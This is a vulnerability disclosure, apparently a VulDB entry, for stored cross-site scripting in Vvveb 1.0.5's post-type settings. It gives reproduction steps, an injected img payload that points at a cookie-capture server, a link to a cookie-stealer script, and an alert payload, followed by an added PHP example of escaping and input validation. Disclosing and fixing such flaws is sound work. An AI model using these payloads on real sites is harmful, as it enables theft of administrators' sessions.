| Title | Vvveb 1.0.5 Cross Site Scripting |
|---|---|

Description

The endpoint at `/vadmin123/index.php?module=settings/post-types` is vulnerable to XSS. When a payload is applied here, it makes the whole site and every endpoint accessed through `/vadmin123/` vulnerable to attack.

This vulnerability can be exploited as long as you are either a “Site Administrator”, “Administrator” or “Super Administrator”.

A well crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else.

Reproduce

Log in as a moderator with the “Site Administrator” role, open the following endpoint:

```
/vadmin123/index.php?module=settings/post-types
```

On the top left, click on the “Add type” button. From here you can add a post type; in the `name="post_type[type]"` field you can enter a payload like the following:

```
"><img src='http://127.0.0.1:1718/capture.php'>
```

This payload will execute any time anyone logs in through the admin panel `/vadmin123/`; it executes malicious JavaScript used for stealing cookies silently.

To set up a cookie stealer server, you can save the following PHP script as capture.php:

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Start a PHP server to serve it:

```
$ php -S x.x.x.x:1718
```

Can also be exploited with:

```
<img/src=x onerror=alert(2025)>
```
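As an added illustration (not part of this report and not Vvveb's own code), the PHP below shows the output pattern that turns a stored `post_type[type]` value into live markup, the attribute-context encoding that renders both payloads quoted above inert, and an input allow-list as defence in depth. The render and validation functions are hypothetical; the sample values are the report's two payloads plus a benign type name.

```php
<?php
// Added illustration, not Vvveb's code: how a stored post-type name reaches
// the admin page and how to encode it. Function names are hypothetical.

declare(strict_types=1);

// Constructed sample input: the two payloads quoted in the report, as they
// would sit in the post_type[type] field, plus a benign value.
$storedTypes = [
    "\"><img src='http://127.0.0.1:1718/capture.php'>",
    "<img/src=x onerror=alert(2025)>",
    "article",
];

// Vulnerable pattern: the stored value is concatenated straight into an
// HTML attribute, so a leading quote closes the attribute and the rest of
// the value becomes its own tag the browser will execute.
function renderTypeVulnerable(string $type): string
{
    return '<input type="text" name="post_type[type]" value="' . $type . '">';
}

// Hardened pattern: encode for the attribute context before output.
// ENT_QUOTES converts both " and ', which is exactly what a quote-breaking
// payload depends on; the charset is named explicitly so nothing is guessed.
function renderTypeEscaped(string $type): string
{
    $safe = htmlspecialchars($type, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="post_type[type]" value="' . $safe . '">';
}

// Defence in depth on input: a post-type identifier never legitimately
// contains markup, so reject anything outside a tight allow-list before it
// is stored. Output encoding above remains the primary control.
function isValidPostType(string $type): bool
{
    return (bool) preg_match('/^[a-z][a-z0-9_-]{0,63}$/', $type);
}

foreach ($storedTypes as $type) {
    printf("input:      %s\n", $type);
    printf("vulnerable: %s\n", renderTypeVulnerable($type));
    printf("escaped:    %s\n", renderTypeEscaped($type));
    printf("accepted:   %s\n\n", isValidPostType($type) ? 'yes' : 'no');
}
```

Run it with `php example.php`: the vulnerable lines contain an unescaped `<img ...>` after the attribute is closed, the escaped lines contain only `&quot;`, `&lt;`, `&gt;` and `&apos;` entities (so the browser shows the text instead of loading the image), and only `article` passes the allow-list.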
| Source | https://hkohi.ca/vulnerability/11 |
|---|---|
| User | 0xHamy (UID 88518) |
| Submitted | 2025-07-29 20:47 (9 months ago) |
| Moderation | 2025-08-04 08:27 (5 days later) |
| Status | Accepted |
| VulDB entry | 318647 [givanz Vvveb up to 1.0.5 Add Type post-types cross site scripting] |
| Points | 20 |